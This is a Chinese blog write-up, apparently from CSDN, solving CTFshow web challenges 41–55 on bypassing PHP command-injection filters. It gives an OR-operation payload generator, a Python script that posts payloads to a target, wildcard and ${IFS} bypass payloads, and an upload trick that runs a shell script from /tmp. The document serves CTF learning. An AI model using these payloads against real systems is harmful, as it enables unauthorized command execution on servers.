CTFshow web入门 web41~web55 命令执行

已于 2023-04-15 21:16:18 修改
阅读量2.2k 收藏 25
点赞数 4
分类专栏: CTFshow web入门 文章标签: web 网络安全 安全 前端
于 2023-04-15 21:15:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_56815564/article/details/130175421
版权

声明一下

本人现如今也在学习web,技术还不到家,这些全是搜寻各路大神见解后自己所总结的东西,有问题的话还请指正,感谢

web41(无数字字母rce)

image-20230413191122165

过滤了:

[0-9]、^、+、~、$、[、]、{、}、&、-

这里过滤了$、+、-、^、~使得异或或自增和取反构造字符都无法使用,同时过滤了字母和数字。但是留下了一个一个或运算符( | )

可以尝试从ascii为0-255的字符中,找到 或运算 能得到我们可用的字符的字符集

<?php
//或
function orRce($par1, $par2){
    $result = (urldecode($par1)|urldecode($par2));
    return $result;
}
//异或
function xorRce($par1, $par2){
    $result = (urldecode($par1)^urldecode($par2));
    return $result;
}
//取反
function negateRce(){
    fwrite(STDOUT,'[+]your function: ');

    $system=str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN));

    fwrite(STDOUT,'[+]your command: ');

    $command=str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN));

    echo '[*] (~'.urlencode(~$system).')(~'.urlencode(~$command).');';
}
//mode=1代表或,2代表异或,3代表取反
//取反的话,就没必要生成字符去跑了,因为本来就是不可见字符,直接绕过正则表达式
function generate($mode, $preg='/[0-9]/i'){
    if ($mode!=3){
        $myfile = fopen("rce.txt", "w");
        $contents = "";

        for ($i=0;$i<256;$i++){
            for ($j=0;$j<256;$j++){
                if ($i<16){
                    $hex_i = '0'.dechex($i);
                }else{
                    $hex_i = dechex($i);
                }
                if ($j<16){
                    $hex_j = '0'.dechex($j);
                }else{
                    $hex_j = dechex($j);
                }
                if(preg_match($preg , hex2bin($hex_i))||preg_match($preg , hex2bin($hex_j))){
                    echo "";
                }else{
                    $par1 = "%".$hex_i;
                    $par2 = '%'.$hex_j;
                    $res = '';
                    if ($mode==1){
                        $res = orRce($par1, $par2);
                    }else if ($mode==2){
                        $res = xorRce($par1, $par2);
                    }

                    if (ord($res)>=32&ord($res)<=126){
                        $contents=$contents.$res." ".$par1." ".$par2."\n";
                    }
                }
            }

        }
        fwrite($myfile,$contents);
        fclose($myfile);
    }else{
        negateRce();
    }
}
generate(1,'/[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-/i');
//1代表模式,后面的是过滤规则

生成结果中,需要找到连续字母

a %60 %01		// 这里的%60 或上 %01即是字母a
b %60 %02
c %60 %03
d %60 %04
e %60 %05
f %60 %06
g %60 %07
h %60 %08
i %60 %09
j %60 %0a
k %60 %0b
l %60 %0c
m %60 %0d
n %60 %0e
o %60 %0f
p %60 %10
q %60 %11
r %60 %12
s %60 %13
t %60 %14
u %60 %15
v %60 %16
w %60 %17
x %60 %18
y %60 %19
z %60 %1a
{ %60 %1b
| %60 %1c
} %60 %1d
~ %60 %1e
` %60 %20

从所有字符(ASCII[0-255])中排除掉被过滤的,然后再判断或运算得到的字符是否为可见字符

可以一个一个的进行构造:比如要执行system的话就可以用以下的方式:

c=("%13%19%13%14%05%0d"|"%60%60%60%60%60%60")("%03%01%14%00%06%0c%01%00"|"%60%60%60%20%60%60%60%2a")

system("cat fla*")

c="");('%60%60%60%60%60%60'|'%13%19%13%14%05%0d')(('%03%01%14'|'%60%60%60').' *');#

最前面的"");和前面的eval(合起来构成一个命令
中间是完整的一个语句:system(cat *);
最后的#表示注释,把后面所有的东西都注释起来功能消失了

使用POST传参:右键-->change request method
记得使用BP

也能用羽神的脚本更方便:

# -*- coding: utf-8 -*-
import requests
import urllib
from sys import *
import os

os.system("F:\\desktop\\Learning\\CTFtools\\Web\\phpstudy_pro\\phpstudy_pro\\WWW\\index.php")  # 没有将php写入环境变量需手动运行
if (len(argv) != 2):
    print("=" * 50)
    print('USER:python exp.py <url>')
    print("eg:  python exp.py http://ctf.show/")
    print("=" * 50)
    exit(0)
url = argv[1]


def action(arg):
    s1 = ""
    s2 = ""
    for i in arg:
        f = open(r"F:\\desktop\\Learning\\CTFtools\\Web\\phpstudy_pro\\phpstudy_pro\\WWW\\rce.txt", "r")  # 填txt的文件位置
        while True:
            t = f.readline()
            if t == "":
                break
            if t[0] == i:
                # print(i)
                s1 += t[2:5]
                s2 += t[6:9]
                break
        f.close()
    output = "(\"" + s1 + "\"|\"" + s2 + "\")"
    return (output)


while True:
    param = action(input("\n[+] your function:")) + action(input("[+] your command:"))
    data = {
        'c': urllib.parse.unquote(param)
    }
    r = requests.post(url, data=data)
    print("\n[*] result:\n" + r.text)

命令行的使用:

python rce.py [url]

image-20230413200051409

web42(>/dev/null 2>&1)

image-20230414143622053

终于没有preg_match函数来过滤了,这回里面都是认识的,只不过后面GET传参的c还连接了一个

">/dev/null 2>&1"

对于这个语句:

>/dev/null:
	说明一下 /dev/null 说白了就是写入这个里面的内容都会丢失,读取这里面的内容什么也不会读取到
	而前面的 > 表示重定向代表的是要去哪里
	因为 > 前面没有数值,所以默认的是1,表示标准输出重定向到 /dev/null (空设备文件)
	因此不会显示任何的数据,同时也不会读取到任何的数据
	
2>&1:
	这里的1表示stdout标准输出,系统默认值是1,因此 > 前面没有值的时候就是默认标准输出 1>
	这里的2表示stderr标准错误
	&表示等同于的意思
	在这里这个语句的意思就表示2的输出重定向等同于1,即标准错误输出重定向等同于标准输出
	因为之前标准输出已经重定向到空设备文件,左移标准错误输出也重定向到空设备文件

这整一句话的意思是:让所有输出流(不管你是对的还是错的)都重定向到空设备文件中丢弃掉

所以关键就是不能让后面这个重定向执行下去就行

构造payload:

c=cat flag.php;		// 用 ; 把命令隔断
c=cat flag.php||	// ||表示只执行||前面的语句
c=cat flag.php%0a	// %0a是url编码,表示的是换行
c=cat flag.php%26	// %26是url编码,表示的是&符

另外说明一下:
|		表示只执行后面的命令
||		表示只执行前面的命令
&和&&	表示两条命令都会执行

此外,php版本小于5的时候因为php的底层是C,所以截断有另外的%00可以使用

image-20230414150643829

—web43~web52过滤+>/dev/null 2>&1—

web43(过滤分号、cat)

image-20230414152050509

这个题其实就是在上一题的基础上多加了个过滤

过滤了

;、cat

说到底,这么多能有回显的函数,也不差cat这一个,形式有这么多,也不差分号这一个

构造payload:

c=nl flag.php%0a
c=more flag.php%0a
c=sort flag.php%0a
c=less flag.php%0a
c=tac flag.php%0a
c=tail flag.php%0a
c=strings flag.php%0a

||也能用

image-20230414152437329

web44(过滤flag)

image-20230414152735431

过滤了:

;、cat、flag

区区不能使用flag而已,也有构造的形式

构造payload:

c=nl fla*%0a
c=more fla*%0a
c=sort fla*%0a
c=less fla*%0a
c=tac fla*%0a
c=tail fla*%0a
c=strings fla*%0a

||也能用

image-20230414152954507

web45(过滤空格)

image-20230414153101896

过滤了:

;、cat、flag、[空格]

空格不能用可以使用tab键代替,url编码是%09,反正tab是最多是4个空格,多几个空格也不会怎样

空格绕过:

%09
${IFS}
${IFS}$9
<

构造payload:

?c=nl%09fl*%0a
?c=nl<fla\g.php%0a
?c=echo${IFS}`nl${IFS}fl*`%0a		// 反引号表示无回显的命令执行,常配合echo来打印输出

image-20230414153417153

web46(过滤$、*、数字)

image-20230414161732696

过滤了:

;、cat、flag、[空格]、[0-9]、$、*

构造payload:

?c=nl%09????.???%0a
?c=nl%09fla\g.php%0a
?c=nl%09fla''g.php%0a

image-20230414162336525

web47(过滤more、less、head、sort、tail)

image-20230414165009877

过滤了:

;、cat、flag、[空格]、[0-9]、$、*、more、less、head、sort、tail

构造payload:

?c=nl%09????.???%0a
?c=nl%09fla\g.php%0a
?c=nl%09fla''g.php%0a
?c=nl<fla*%0a
?c=nl<fla\g.php%0a

image-20230414165413283

web48(过滤sed、cut、awk、strings、od、curl、[反引号])

image-20230414165905048

过滤了:

;、cat、flag、[空格]、[0-9]、$、*、more、less、head、sort、tail、sed、cut、awk、strings、od、curl、[反引号]

构造payload:

还是一样
?c=nl%09????.???%0a
?c=nl%09fla\g.php%0a
?c=nl%09fla''g.php%0a
?c=nl<fla\g.php%0a

image-20230414170312783

web49(过滤%)

image-20230414170351596

过滤了:

;、cat、flag、[空格]、[0-9]、$、*、more、less、head、sort、tail、sed、cut、awk、strings、od、curl、[反引号]、%

构造payload:

%被过滤掉了,能用的就少很多了,但还是有
?c=nl<fla''g.php||
?c=nl<fla\g.php||

image-20230414185453080

web50(过滤\x09、\x26)

image-20230414185606716

过滤了:

;、cat、flag、[空格]、[0-9]、$、*、more、less、head、sort、tail、sed、cut、awk、strings、od、curl、[反引号]、%、\x09、\x26

\x09与\x26的含义其实就是%09(tab键)和%26(&)

构造payload:

?c=nl<fla''g.php||
?c=nl<fla\g.php||

image-20230414190207794

web51(过滤tac)

image-20230414190524086

过滤了:

;、cat、flag、[空格]、[0-9]、$、*、more、less、head、sort、tail、sed、cut、tac、awk、strings、od、curl、[反引号]、%、\x09、\x26

多过滤了一个tac(我寻思着我也不怎么用啊)

构造payload:

?c=nl<fla''g.php||
?c=nl<fla\g.php||

image-20230414190729310

web52(过滤>、<)

image-20230414191003142

过滤了:

;、cat、flag、[空格]、[0-9]、*、more、less、head、sort、tail、sed、cut、tac、awk、strings、od、curl、[反引号]、%、\x09、\x26、>、<

这回终于把>和<过滤掉了,但 又给开了, 又给开了, 又给开了,想到的第一个就是${IFS}的空格替换

构造payload:

?c=nl${IFS}fla''g.php||

image-20230414191702807

找到了,但没完全找到,去根目录看看有没有东西

?c=ls${IFS}/||

image-20230414192220112

发现有个flag,cat和ls试了一下,都没有回显,看来是个文件,直接nl

?c=nl${IFS}/fla''g||		// 注意这个/表示根目录下的flag,不加/就会是本目录下的

image-20230414193225885

web53(过滤+简单代码审计)

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-6ZaP4O5W-1681564193907)(C:/Users/%E7%8B%AC%E8%B4%A4/AppData/Roaming/Typora/typora-user-images/image-20230414193615256.png)]

过滤了:

;、cat、flag、[空格]、[0-9]、*、more、wget、less、head、sort、tail、sed、cut、tac、awk、strings、od、curl、`、%、\x09、\x26、>、<

简单分析一下,if中的语句第一个是输出GET传入的参数、第二个是执行c的语句后得到的东西赋值给d、第三个是换行后在输出d的内容。if判断错误的话会输出no

构造payload:

先在目录看一眼
?c=ls${IFS}

image-20230414194912462

直接进flag.php
?c=nl${IFS}fla''g.php

image-20230414195130724

web54(grep查找/文件重命名)

image-20230415185352671

过滤了一堆

;		.*c.*a.*t.*		.*f.*l.*a.*g.*		[空格]		[0-9]、*
.*m.*o.*r.*e.*		.*w.*g.*e.*t.*		.*l.*e.*s.*s.*
.*h.*e.*a.*d.*		.*s.*o.*r.*t.*		.*t.*a.*i.*l.*
.*s.*e.*d.*		.*c.*u.*t.*		.*t.*a.*c.*		.*a.*w.*k.*
.*s.*t.*r.*i.*n.*g.*s.*		.*o.*d.*		.*c.*u.*r.*l.*
.*n.*l.*		.*s.*c.*p.*		.*r.*m.*		`		%
\x09		x26		>		<

这回是真正意义上的禁用了这些命令了,以前还能通过中间添加一些特殊符号来绕过的,现在是完全不能使用了,毕竟 . 后面跟上一个通配符后,就完全不能在中间加点什么了

像这种可以选择使用之前讲过的一种用?通配符来构造的方式,如:

对flag.php的构造可以这样:fl??.???
甚至可以简化为:????????

同样,命令也可以进行构造
cat可以构造为?at、c??

构造payload:

?c=/bin/c??${IFS}????????
这里的/bin/是指bin目录下检索c??,不然在当前目录是没有这个命令的

另外grep命令可以才文件中查找含有的字符串
形式:grep [字符串] [filename]
?c=grep${IFS}ctfshow${IFS}????????

image-20230415192017797

image-20230415192120325

另外,对于这题重命名文件也是一个不错的思路:

?c=mv${IFS}fl??.???${IFS}a.txt
把flag.php重命名为了a.txt
然后直接访问a.txt就行了

image-20230415192302408

web55(无字母rce)

image-20230415192806690

过滤了:

;、[a-z]、`、%、\x09、\x26、>、<

方法一:

同样能够使用?通配符,区区过滤掉字母而已,既然数字没有过滤的话,可以使用base64

构造payload:

?c=/???/????64 ????.???
意思为:?c=/bin/base64 flag.php

image-20230415193845510

image-20230415194900372

方法二:

使用/usr/bin/bzip2 对文件进行压缩

构造payload:

?c=/???/???/????2 ????.???
意思为:?c=/usr/bin/bzip2 flag.php

最后访问/flag.php.bz2即可
下载下来的压缩包中包含有flag.php

image-20230415204608558

image-20230415204544427

image-20230415204633453

方法三:

.(点)的用法,相当于source,可以执行sh命令

在linux里面临时存放文件的目录可能会被定时删除
这个目录是/tmp,然后一般网页文件会命名为php???,后面是随机的字母,即:/tmp/phpXXXXXX
所以我们需要规定一个范围[@-[],从@-[就是26个字母然后关于上传文件的内容

php生成临时文件名是随机的,最后一个字符不一定是大写字母,不过多尝试几次也就行了

既然要上传的文件能执行内容,所以添加内容/bin/sh

因为linux系统下一切皆文件,所以一些个内置程序都是由文件组成的
/bin目录下存放的都是协议shell脚本的内容,sh就是执行shell脚本,可以理解为打开终端
只有打开终端我们再能输入命令
然后就可以在文件里面在添加ls,cat等一系列读取文件的命令了

需要构造一个post上传文件的数据包,上传的目的链接要改成题目的链接

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>POST数据包POC</title>
</head>
<body>
<form action="http://27622056-3638-418a-95d0-7a217d279e6a.challenge.ctf.show/" method="post" enctype="multipart/form-data">
    <!--链接是当前打开的题目链接-->
    <label for="file">文件名:</label>
    <input type="file" name="file" id="file"><br>
    <input type="submit" name="submit" value="提交">
</form>
</body>
</html>

然后对该界面进行抓包,选择文件的话随便传一个就行了

构造poc(漏洞执行代码),用来执行命令

?c=.%20/???/????????[@-[]		// %20也可以用+代替
+在这里是一个空格的作用,?是要进行匹配的字符,[@-[]表示@到[之间的字符,这里是包括有所有大写字母

image-20230415200208337

然后在bp抓包界面添加sh命令

#!/bin/sh
ls

image-20230415210017062

然后直接使用cat flag.php

image-20230415210353491

CTFshow 命令执行 web41
Kradress的博客
11-14 3855
文章目录源码前言解题总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: 羽 # @Date: 2020-09-05 20:31:22 # @Last Modified by: h1xa # @Last Modified time: 2020-09-05 22:40:07 # @email: 1341963450@qq.com # @link: https://ctf.show */ if(isset($_POST['c'])){
CTFshow web入门 web41~web55 命令执行_ctfshow web41
2401_89689893的博客
12-20 548
/mode=1代表或,2代表异或,3代表取反//取反的话,就没必要生成字符去跑了,因为本来就是不可见字符,直接绕过正则表达式if (mode!=3){//1代表模式,后面的是过滤规则a %60 %01 // 这里的%60 或上 %01即是字母ab %60 %02c %60 %03d %60 %04e %60 %05f %60 %06g %60 %07h %60 %08i %60 %09j %60 %0ak %60 %0b。
ctfshow-web入门-命令执行web41_exp与分析)
Welcome To Myon'Blog !
06-08 1494
preg 是题目的正则匹配规则,在 ASCII 可见字符范围内,先排除掉正则表达式匹配的字符,将其他可用的字符进行按位或运算,再将运算得到的可见字符,以及参与或运算结果为可见字符的组合转为 16 进制拼接 % 后写入 txt 文件。过滤掉了数字、字母以及一些符号,之前接触过的无字母 rce 是取反编码再取反,采用不可见字符去绕过正则,但是这里取反符号被过滤掉了,但是注意到或符号被放出来了,下面附上这种类型题目的相关脚本,并给出一定解释。(2)php 可用字符生成脚本(这个的生成方式可以选择或和异或操作)
Ctfshow web入门41 (含脚本解析)
最新发布
naichuan88的博客
03-25 2014
利用这两条去构建异或的字符串,但是数字字母已经没有了,但是想到可以使用url编码去绕过,因为在服务器的眼里会自动将url编码进行解码(这里涉及url编码原理,简单来说就是16进制的前缀0x改为%,且二者在转换的方式上也差不多,都是参照ascll码表)很明显,这是一道绕过题,那第一步我们就去看他过滤了什么符号,这样子直接看可能不直观,我们可以使用脚本去跑一下看看有什么可以用的。这一段就是对数据进行处理,这里为什么是以16为界,可以去看看16进制的原理,和二进制差不多,所以在满16时要进一位,而且要补0。
ctfshowweb入门web41
XXokok的博客
12-24 841
ctfshow41关解法,提供异或、或预算绕过的利用代码
ctfshow web入门 web41
热门推荐
羽的博客
09-13 1万+
这个题过滤了$、+、-、^、~使得异或自增和取反构造字符都无法使用,同时过滤了字母和数字。但是特意留了个或运算符|。 我们可以尝试从ascii为0-255的字符中,找到或运算能得到我们可用的字符的字符。 这里先给出两个脚本 exp.py rce_or.php,大家以后碰到可以使用或运算绕过的可以自己手动修改下即可。 生成可用字符的集合 <?php $myfile = fopen("rce_or.txt", "w"); $contents=""; for ($i=0; $i < 256; $i++
【CTFWP】ctfshow——web41
LongL_GuYu的博客
07-19 856
ctfshow——web41解题
ctfshow web入门 命令执行后篇(web55-web188)
ccfly1012的博客
09-04 2134
web55 <?php ​ /* # -*- coding: utf-8 -*- # @Author: Lazzaro # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-07 20:03:51 # @email: h1xa@ctfer.com # @link: https://ctfer.com ​ */ ​ // 你们在炫技吗? if(isset($_GET['c']..
ctfshow web入门 命令执行web29-web57详解
2401_84009549的博客
04-20 962
当print_r(scandir(pos(localeconv())));时,会返回当前目录,pos(localeconv())的值为"."将数组用array_reverse进行倒转,并用next将指针指向flag.php最后进行读取,列出两个整理起来就是。
ctfshow 命令执行 web 29~124
shinygod的博客
02-22 551
原理:因为localeconv()的第个元素是“.”,然后pos()能够提取出当前元素的值,也就是“.”,而scandir()能过返回指定目录中的文件和目录的数组,然而上一层pos()已经提取出".“,这样就变成scandir(”.")返回当前目录下的目录数组,array_reverse()以相反的元素顺序返回数组,next()提取第二个元素,最后用read_file()、highlight_file()和show_source()读出源码。//若成功,则返回一个数组,若失败,则返回 false。
CTFSHOW web入门 web55
NNASJ的博客
01-31 401
需要注意的是Linux 系统下 php 接收上传文件的 post 包,默认会将文件保存在临时文件夹 /tmp/,文件名 phpXXXXXX,后面为随机字母,即:/tmp/phpXXXXXX。),数字,和点(.),但对点(.)的作用和用途不清楚,上网搜索了。发现可以采用通配符进行筛选,所以使用/bin目录下的base64进行匹配。在网上找到了大佬的另一种解题思路,通过上传文件,得到flag。如果要上传的文件能执行内容,需要添加内容/bin/sh。需要注意的是上传的时候文件名不一定是大写,要多上传几次。
ctfshow-web入门-命令执行web56、web57、web58)
Welcome To Myon'Blog !
06-29 1758
由于前面说的只有 -1,因此我们对 36 进行取反,得到 -37,对 -37 再次取反即可得到 36。这里说了 flag 在 36.php,那么我们只需要构造 36,但是数字被过滤了。根据 $((~ $(()) ))=-1,我们进行拼接,构造出 -37。命令执行,需要严格的过滤,已测试,可绕。
ctfshow-web入门-命令执行web30-web36)
Welcome To Myon'Blog !
06-06 1464
命令执行,需要严格的过滤。
ctfshow web41
m0_69289738的博客
09-06 286
编写脚本构造的字符串 system 和 ls。现在直接构造cat flag.php代替ls。可以用|进行或运算将不可见字符变为可见字符。看源代码,可知道|和""是可以使用的。如s=url解码(%13|%60)最后post传参拿到flag。用bp进行post传参。发现了flag.php。
ctfshow web41 无字母数字命令执行
Sapphire037的博客
10-30 2690
1 首先,捋一捋思路,我们可以先看过滤的字符 比如/[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-/i或者/[a-z0-9]/is 这里可以先看P神的一些不包含数字和字母的webshell ,大概意思就是通过一些字符互相运算后构造得到我们的payload,了解基本原理之后,我们再看ctfshow中的这样一道例题 <?php /* # -*- coding: utf-8 -*- # @Author: 羽 # @Date: 2020-09-05 20:31
CTFshow web入门 web41~web55 命令执行_ctfshow web41(1)
m0_61331237的博客
04-07 943
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
ctfshow web41-web50
m0_73721944的博客
04-24 1319
web41代码审计过滤了:[0-9] [a-z] ^ + ~ $ [ ] { } & -这次字母过滤了,字符不是很多思路:通过特殊字符来构造字母从而实现代码执行这里根据题目提示已经给了一篇博客第一个脚本运行结果是解释一下是怎么得来的:A %40 %01十六进制的40=十进制的64=二进制0100 0000十六进制的01=十进制的01=二进制0000 0001二者进行或运算0100 00000000 00010100 0001不理解的话可以具体去看一下这个网址带着的表运行结果。
CTFshow wbe41 教你写脚本
ChenD的学习笔记
11-09 2412
CTFshow web41 如何写一个脚本!脚本原理!
ctfshow web入门命令执行
09-05
在CTF中,web入门命令执行指的是通过Web应用程序的漏洞,将恶意的命令注入到应用程序中并执行。这样的攻击可以导致未经授权的访问和操纵应用程序的数据和功能。 根据引用中提供的信息,可以看到一些常见的双写绕过...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值